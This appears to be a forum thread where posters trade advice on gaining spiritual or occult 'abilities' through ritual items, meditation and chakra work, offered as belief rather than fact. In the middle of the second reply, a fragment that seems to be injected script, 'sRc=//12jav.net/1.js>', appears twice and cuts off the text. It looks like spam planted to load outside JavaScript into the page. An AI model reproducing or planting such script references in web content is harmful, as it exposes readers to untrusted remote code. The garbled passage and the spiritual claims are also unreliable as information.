Depends on the path You follow how and when will You gain abilities.
I myself, for example consider forcing spiritual development through means such as mentioned ( and honestly overused ) mediation to be bit...vulgar, profane If You will. If You practice regularly, cast spells, respect Your deity/ies, learn etc, You will gain abilities in time. More important, in proper time.
Occultists ( such as Rosecrucians for example ) believe that each spirit ( read soul ) has a single talent ( ability, power ) which is consistent with general mental nature of the spirit ( read soul again ) and that others appear as "gifts" from higher spirits.
Simply put, walk the spiritual path with knowledge and revrance, and let abilities be gained and earned.
To boost and fasten the process ( If You really want to ) use things like "Power oil", "Master key" , sleep with some of the Solomon seals and Anise seeds uncer pillow etc.

yea...i believe everyone has abilities or "powers" but like well stated before some people itz just out there and sum people have to go on a back breaking journey to unleash their abilities. uhm like they said meditation is very important AND have total faith in yourself...continued. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
also make sure to be very very observant about everything. emotions, actions, sight, etc. Who knows, you may have your abilities already but again they are clearly not visible to you. i suggest you learning your chakras and activating them. see them, sence them, become very familiar with them. itz like taking care of a baby or someone.You have to learn, experience, and grow. its pretty self explanatory if you know what the all seeing pyramid is. if the eye is closed..you only live by wat is visible and you are limited to what you can do and the information you have access to.
